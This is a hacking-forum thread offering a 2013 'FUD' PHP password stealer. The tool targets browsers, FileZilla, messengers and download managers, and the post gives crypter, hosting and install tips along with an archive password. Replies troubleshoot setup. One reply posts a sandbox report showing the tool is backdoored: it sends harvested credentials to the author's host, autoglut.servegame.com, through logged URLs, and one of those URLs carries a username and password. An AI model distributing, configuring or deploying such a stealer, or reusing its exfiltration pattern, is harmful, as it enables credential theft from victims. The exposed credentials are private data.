Anti-Av PHP Stealer [2013 FUD] Stabil!

Slwestr

Hey guys, it's our 1st PHP stealer. We are happy to share.

-Internet Explorer 6-7-8-9-10 !

-Internet Download Manager

-Filezilla Client / Server

-Google Chrome all

-Opera all

-Safari all

-Mozilla Firefox all

-Messenger Live

-Yahoo Messenger

-JDownloader

Which stealer can get ie10 pw's from win8 x64? :)

Tested;

WinXP, Vista x32-x64, Win7 x86-x64, Win8 x86-x64!

PHP Logs panel;

We are sharing the stealer with a FUD crypter;

Stealer exe crypted results; but the exe size increased, because a protector was used.

install tut, used free host website: 000webhost,

Download;

Alternative;

rar pass: slwestr

notes: autoglut.servegame.com is update check page..

Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

Password doesn't work.

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

Tested, but doesn't work. no logs come to the page.

I've done everything fine, installing page making the trojan.

what's the problem?

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

I think it's a website MySQL problem, or your PC doesn't have any saved passwords?

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

The stealer works fine, I tested it, nice share.

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

I'm using a paid host on HostGator to do that. I worked with other stealers and they work fine, but this one does not :(

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

I get this error message when I click test log

---------------------------

Anti-av

---------------------------

hata var bilader, tekrar bak

---------------------------

OK

---------------------------

My OS is Win8 Enterprise.

What is the solution?

 
Re: Anti-Av PHP Stealer [2013 FUD] Stabil!

As ЭдБытсс rightly says, it is backdoored.

BSA report:

[ Changes to filesystem ]

* Modifies file C:\Users\XXXX\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat

* Deletes file C:\Users\XXXX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp

[ Changes to registry ]

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{0358B920-0AC7-461F-98F4-58E32CD89148}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{057EEE47-2572-4AA1-88D7-60CE2149E33C}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

* Creates Registry key HKEY_LOCAL_MACHINE\software\classes\clsid\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledProcesses

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows\DisabledSessions

* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\PeerDist\Service

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea5f7-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1e9ea634-5fc9-11e1-b06c-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{45cc1d6c-eca1-11e1-9547-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{7c627537-5fd7-11e1-9cc6-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b0b98a20-5f41-11e1-b30b-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b124dd89-6004-11e1-aaa9-000c292fcffb}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b3a9e94c-a932-11e2-b7b2-806e6f6e6963}

old value empty

* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ed3bffff-790f-11e1-a31b-000c292fcffb}

old value empty

* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content

old value "CachePrefix=0000"

* Modifies value "SavedLegacySettings" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

* Modifies value "DefaultConnectionSettings" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

* Creates value "TEST.exe=Slwestr" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer

binary data=53006C00770065007300740072000000

[ Network services ]

* Looks for an Internet connection.

* Queries DNS "autoglut.servegame.com".

* G:\DESCARGAS\EXCLUIDO AVS\AAStealer\Stealer\TEST.exe Connects to "50.28.8.18" on port 80 (TCP - HTTP).

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=Password&password=Password%20Strength&app=User%20Name&pcname=EDITADO-POR-MI&sitename=eb%20Browser".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20hackear%20a%20tu%20puta%20madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&[email protected]&password=a%20pelarla%20lammersillo%20jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com".

* Downloads file from "autoglut.servegame.com/check/index.php?action=add&username=u947071809&password=3nGZRuaEqL&app=Filezilla&pcname=XXXX&sitename=31.170.166.199".

* Opens next URLs:

[link hidden] Strength&app=User Name&pcname=XXXX&sitename=eb Browser --->> backdoor

[link hidden] hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com ---> correct, this is what I would receive

[link hidden] hackear a tu puta madre&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

[link hidden] pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com ---> correct, this is what I would receive

[link hidden] pelarla lammersillo jejeje&app=Messenger&pcname=XXXX&sitename=www.hotmail.com --->> backdoor

[link hidden] ---> correct, this is what I would receive

[link hidden] --->> backdoor

[ Process/window/string information ]

* Deletes activity traces.

* Sleeps 960 seconds.

P.S.: I used two accounts with fake passwords for testing, and one FileZilla account that was real, although I no longer use it. That is the only thing I edited in the report, apart from the name of my PC.

As you can see, besides localhost it also connects to the author.

P.S. 2: the forum is running very slowly for me; posting this was a real struggle.

Regards
 